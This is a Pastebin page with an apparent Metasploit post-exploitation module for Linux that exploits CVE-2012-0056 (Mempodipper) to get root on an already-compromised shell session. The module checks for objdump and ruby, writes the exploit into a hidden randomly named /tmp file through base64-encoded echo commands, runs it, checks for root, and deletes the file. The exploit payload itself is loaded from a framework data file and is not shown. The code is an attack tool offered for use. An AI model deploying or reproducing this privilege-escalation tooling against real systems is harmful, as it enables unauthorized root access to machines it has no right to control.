daily pastebin goal
50%
SHARE
TWEET

Untitled

a guest Jan 26th, 2012 975 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##
  2. # $Id$
  3. ##
  4.  
  5. ##
  6. # This file is part of the Metasploit Framework and may be subject to
  7. # redistribution and commercial restrictions. Please see the Metasploit
  8. # Framework web site for more information on licensing and terms of use.
  9. # http://metasploit.com/framework/
  10. ##
  11.  
  12. require 'msf/core'
  13. require 'rex'
  14. require 'msf/core/post/common'
  15. require 'msf/core/post/file'
  16. require 'msf/core/post/linux/priv'
  17. require 'msf/core/post/linux/system'
  18.  
  19. class Metasploit3 < Msf::Post
  20.  
  21.         include Msf::Post::Common
  22.         include Msf::Post::File
  23.         include Msf::Post::Linux::Priv
  24.         include Msf::Post::Linux::System
  25.  
  26.         def initialize(info={})
  27.                 super( update_info( info,
  28.                         'Name'          => 'Exploit CVE-2012-0056 to get root',
  29.                         'Description'   => %q{ This module try elevate your privilages by exploitng CVE-2012-0056},
  30.                         'License'       => MSF_LICENSE,
  31.                         'Author'        => [ 'mak' ],
  32.                         'Version'       => '$Revision$',
  33.                         'Platform'      => [ 'linux' ],
  34.                         'SessionTypes'  => [ 'shell' ], ## no mete for now?
  35.                 ))
  36.         end
  37.  
  38.         def run
  39.           print_status("Using cve-2012-56 to elevete privs on session #{session.inspect}...")
  40.  
  41.           if is_root?
  42.             print_status "Already root, so no need to upgrade permissions. Aborting."
  43.             return
  44.           end
  45.  
  46.           objdump_bin = cmd_exec("which objdump")
  47.           ruby_bin = cmd_exec("which ruby")
  48.  
  49.           if [objdump_bin,ruby_bin].any? {|x| x.empty?}
  50.             print_erorr "This exploit is usless without etiher objdump or ruby on owned machine"
  51.             return
  52.           end
  53.  
  54.           sploit_file = "/tmp/." + Rex::Text.rand_text_alpha(8) + '.rb'
  55.  
  56.           print_status "Coping exploit to #{sploit_file} it may take a while"
  57.  
  58.           begin
  59.             ::Timeout.timeout(240) do
  60.  
  61.               generate_exploit().split("\n").each  do |l|
  62.                 l = Rex::Text.encode_base64(l)
  63.                 cmd_exec("echo #{l} | base64 -d >> #{sploit_file} ; echo '' >> #{sploit_file}")
  64.               end
  65.  
  66.               print_status "Lunching exploit..."
  67.  
  68.               cmd_exec("ruby #{sploit_file}")
  69.  
  70.  
  71.             end
  72.           rescue ::Timeout::Error
  73.             print_error "mempodipper: failed du to timeout"
  74.           rescue
  75.             print_error "mempodipper failed. Check the session log."
  76.           end
  77.  
  78.           if is_root?
  79.             print_good "Got root. Nice."
  80.           else
  81.             print_error "Sorry Mempodipper faild."
  82.           end
  83.  
  84.           cmd_exec "rm #{sploit_file}"
  85.         end
  86.  
  87.  
  88.         def generate_exploit
  89.  
  90.           file = ::File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-0056.rb")
  91.  
  92.           met = ::File.open(file, "rb") {|f|
  93.             f.read(f.stat.size)
  94.           }
  95.  
  96.           return met
  97.  
  98.         end
  99. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top